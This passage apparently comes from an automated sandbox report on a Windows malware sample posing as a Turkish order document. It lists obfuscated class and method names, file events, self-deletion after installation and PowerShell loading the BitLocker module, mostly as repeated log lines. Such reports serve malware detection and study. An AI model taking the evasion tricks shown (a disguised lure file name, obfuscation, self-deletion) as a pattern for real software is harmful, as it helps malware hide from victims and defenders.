            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, BDhqcm3UeZWT7A9K30.csHigh entropy of concatenated method names: 'E2cNUt9JZX', 'sAfNvMqBZt', 'nx3NxNDweS', 'zCjNF4lqqe', 'USaNoRW76C', 'kQGNpUV1MU', 'cxkNASXVHt', 'B77N3bxyMO', 'ocSNglJF1y', 'FtpNLFXHQy'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, URwXUFBkg0MlltB7UT.csHigh entropy of concatenated method names: 'm7MpUrwGO0', 'Am5pxgR61u', 'XSspogGfgO', 'mC3pAttV5y', 'YLJp3b1uJv', 'U7SoOhubaU', 'qeXo5xKrch', 'iP4oMlj2Id', 'WN9oDig9qa', 'GeGojVpHtC'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, o43hex2TD0vtHdwI8s.csHigh entropy of concatenated method names: 'iQirA5EYD3', 'Hbdr31RAsA', 'PbcrL8dpDU', 'VxwrhHfiFK', 'S89raFRORw', 'YUFrbkg0Ml', 'oeInT3XV12k7ZZaxmT', 'LkUtVogbuMdFmFJVme', 'xIpmPnatLyJ2YJD9tN', 'j2Trr4f4f3'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, g5Gsf8thO2d1YMtUaY.csHigh entropy of concatenated method names: 'Pq3AvKDdHd', 'XeSAFyjKIK', 'kt4ApI8rQv', 'AaqpXEhRyS', 'Wf9pz5YUlU', 'Kk3AyLqRg7', 'nkBArTcXuP', 'AyrAeXeZWP', 'JWCANNXhUe', 'y9NA2yQoKT'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, jGA7F3es1uwcXBQf56.csHigh entropy of concatenated method names: 'kWaSJK1Xa', 'hQD0E3sWm', 'Qsu1e49La', 'jvvnac0en', 'aAJQoTDn1', 'D0ispGaF7', 'Ge6JxjBPkjPXdQbLQ5', 'Qm3dK0AC6KLxR81K78', 'yMLCZrvMN', 'Seqll5rYe'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, yTB8liQbc8dpDUMxwH.csHigh entropy of concatenated method names: 'DhfF0JCW7Q', 'lxYF1T13Fb', 'tyBFVmSKUp', 'alnFQ5J0Q6', 'SDWFadhLKx', 'rDVFbbTZ6V', 'V8PFRLiamB', 'g5nFCclAi7', 'HY1FE2i56F', 'G24FlsXFtS'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, zVmAtVXaZ7bPSxv3Fo.csHigh entropy of concatenated method names: 'R8kErHthN4', 'qqjENLInr4', 'xiIE2FQfW4', 'dd2Ev3rErQ', 'BifExlAUQX', 'z1OEofaDJj', 'oqoEpROpYx', 'wjdCMHEw67', 'I2ACDyERfu', 'K32Cj38ZmS'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, wNIeg05p2J7LI0sxAR.csHigh entropy of concatenated method names: 'NImRDM0cjf', 'TpyRXtcAxC', 'U9UCyfsU2Y', 'cFsCrg05Ja', 'WkYRHdyqxA', 'VK1R7oyHoy', 'TnsRiBCRj8', 'MprRunGlCo', 'vABRGG4Awa', 'gteRf7AQBg'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, hlp3NEjD1wHnN17DLi.csHigh entropy of concatenated method names: 'wIfCBKOMC0', 'DbOCT3JGFl', 'M1ACYxOm3s', 'iEVCmZ3mDg', 'OjTCuoyvxr', 'wjRC9C74ho', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, Avoj1xuZSJJPO5cL1n.csHigh entropy of concatenated method names: 'mSgaJCtutB', 'E1ma7q9C06', 'tGDaubWDjp', 'mBmaG79fZ5', 'Cd7aTQkUjY', 'bCLaY33FCU', 'THkamxRFp0', 'hP0a9vnUAQ', 'gg9aweanRF', 'bjNatNwR5B'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, CrKSSdWwC4ohnA1aue.csHigh entropy of concatenated method names: 'FbcRLh9JgW', 'jAcRhTGmdL', 'ToString', 'NgLRv9Nkw7', 'lO9RxlUuY0', 'GBMRFs2DJG', 'KE6RoDYiNq', 'EWVRpU1TA9', 'q9NRAXobQ3', 'rCYR3ItP2u'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, P5EYD3VTbd1RAsAUnc.csHigh entropy of concatenated method names: 'lIQxuGqBEd', 'lNDxG4akiX', 'xn5xfXSDWn', 'mTDxW1A7F3', 'i0MxOJ0R0H', 'Ehvx5QMOxZ', 'zgWxMVXbHG', 'M5axDxXSAO', 'Pt2xjtUxmm', 'R6exXPw9uo'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, qHo7EMPthDctL8gHN0.csHigh entropy of concatenated method names: 'EajAcq0svO', 'bM9AKy4rSt', 'tAvASO0B7o', 'QsKA0dtng0', 'DfMAkRxMDn', 'jDgA17kEOA', 'xg9An6Eecn', 'hkvAVKo0ix', 'NbcAQ1kv6D', 'MIGAsXO45h'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, C4bZLLrNrbZofIeJmqZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'M4mluCB7tx', 'pmClGW8veQ', 'JRFlfUXl8p', 'vgnlWvLPBr', 'Q9glO2DBFn', 'de5l55Dt4Y', 'eT8lM47SDF'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, hKuFhjryaSVDxkDxM28.csHigh entropy of concatenated method names: 'LBfEcUNRag', 'jMiEKlDBRT', 'swcES0hw9u', 'wysE0uIYat', 'vCQEk7rGdX', 'rBeE1LsXM1', 'osTEn4GX1U', 'IyxEVHWqBo', 'WehEQn8egO', 'LnBEsHihx6'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, oDcZLoiMDjhxP6TWfD.csHigh entropy of concatenated method names: 'yVw4Vna94c', 'PVF4QoR7Tu', 'hWn4BgyStB', 'oZX4TnfV5q', 'whp4mFUbNK', 'lR249NSKy6', 'ITs4teOODJ', 'VMg46r7Skx', 'dHW4JBj2m2', 'umb4Hao2Ha'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, SPjLDHDQd8ndbtcfNw.csHigh entropy of concatenated method names: 'NYOCvhndW7', 'hpBCxC4spn', 'XgICFHUOhg', 'z8LCoOkimi', 'rmZCprJP8U', 'MKECAwMWul', 'e3uC3xtEUn', 'ceyCgeqwR8', 'cvOCLKn0mF', 'h2KChdl6ZO'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, FxTBy2f31BZEcJBBZx.csHigh entropy of concatenated method names: 'ToString', 'aJdbH1vyeo', 't4gbTmS45i', 'mELbYoVfjs', 'fJkbmjXknP', 'FcBb9XxU9w', 'wK3bw5CDbI', 'DSKbt6qKVw', 'O9Hb6WAoEg', 'fwFbPODYZe'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, Cv8vxsTJ4YVbIBS0cF.csHigh entropy of concatenated method names: 'G3kF0E303P3ObbByeTh', 'V2mI0K3VGSFTA5wFxkA', 'bd8Uor3FAOSvJmju4Ym', 'HrFpCtyo6e', 'e5BpEoJdR5', 'XEKplVYVQJ', 'b22NTc3TDBM9ao9Zv6a', 'bp9DpI3sfSQ1HZJbi68', 'KUANZk3EpWQm3p8UuQA'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, QLUuWKz8Wdj3Ib1tdJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LPYE4aX3fJ', 'fv2EaxPxpW', 'WYfEbaQsqS', 'DExERX2WPl', 'FMHECfGgGa', 'hq4EEWjRnq', 'O1cEl0qjc9'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, lHBIC5x361wOap6SkM.csHigh entropy of concatenated method names: 'Dispose', 'X0arjahDUi', 'MAaeTds3j2', 'NlHqqhjSKI', 'OfPrXjLDHQ', 'v8nrzdbtcf', 'ProcessDialogKey', 'cwFeylp3NE', 'W1werHnN17', 'XLieeSVmAt'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, BDhqcm3UeZWT7A9K30.csHigh entropy of concatenated method names: 'E2cNUt9JZX', 'sAfNvMqBZt', 'nx3NxNDweS', 'zCjNF4lqqe', 'USaNoRW76C', 'kQGNpUV1MU', 'cxkNASXVHt', 'B77N3bxyMO', 'ocSNglJF1y', 'FtpNLFXHQy'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, URwXUFBkg0MlltB7UT.csHigh entropy of concatenated method names: 'm7MpUrwGO0', 'Am5pxgR61u', 'XSspogGfgO', 'mC3pAttV5y', 'YLJp3b1uJv', 'U7SoOhubaU', 'qeXo5xKrch', 'iP4oMlj2Id', 'WN9oDig9qa', 'GeGojVpHtC'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, o43hex2TD0vtHdwI8s.csHigh entropy of concatenated method names: 'iQirA5EYD3', 'Hbdr31RAsA', 'PbcrL8dpDU', 'VxwrhHfiFK', 'S89raFRORw', 'YUFrbkg0Ml', 'oeInT3XV12k7ZZaxmT', 'LkUtVogbuMdFmFJVme', 'xIpmPnatLyJ2YJD9tN', 'j2Trr4f4f3'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, g5Gsf8thO2d1YMtUaY.csHigh entropy of concatenated method names: 'Pq3AvKDdHd', 'XeSAFyjKIK', 'kt4ApI8rQv', 'AaqpXEhRyS', 'Wf9pz5YUlU', 'Kk3AyLqRg7', 'nkBArTcXuP', 'AyrAeXeZWP', 'JWCANNXhUe', 'y9NA2yQoKT'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, jGA7F3es1uwcXBQf56.csHigh entropy of concatenated method names: 'kWaSJK1Xa', 'hQD0E3sWm', 'Qsu1e49La', 'jvvnac0en', 'aAJQoTDn1', 'D0ispGaF7', 'Ge6JxjBPkjPXdQbLQ5', 'Qm3dK0AC6KLxR81K78', 'yMLCZrvMN', 'Seqll5rYe'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, yTB8liQbc8dpDUMxwH.csHigh entropy of concatenated method names: 'DhfF0JCW7Q', 'lxYF1T13Fb', 'tyBFVmSKUp', 'alnFQ5J0Q6', 'SDWFadhLKx', 'rDVFbbTZ6V', 'V8PFRLiamB', 'g5nFCclAi7', 'HY1FE2i56F', 'G24FlsXFtS'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, zVmAtVXaZ7bPSxv3Fo.csHigh entropy of concatenated method names: 'R8kErHthN4', 'qqjENLInr4', 'xiIE2FQfW4', 'dd2Ev3rErQ', 'BifExlAUQX', 'z1OEofaDJj', 'oqoEpROpYx', 'wjdCMHEw67', 'I2ACDyERfu', 'K32Cj38ZmS'
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeFile created: \03.07.2024-sipari#u015f ug01072410 -onka ve tic a.s.exe
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeFile created: \03.07.2024-sipari#u015f ug01072410 -onka ve tic a.s.exe
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeFile created: \03.07.2024-sipari#u015f ug01072410 -onka ve tic a.s.exeJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeFile created: \03.07.2024-sipari#u015f ug01072410 -onka ve tic a.s.exeJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Deletes itself after installation
            Source: C:\Windows\SysWOW64\shutdown.exeFile deleted: c:\users\user\desktop\03.07.2024-sipari#u015f ug01072410 -onka ve tic a.s.exeJump to behavior
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
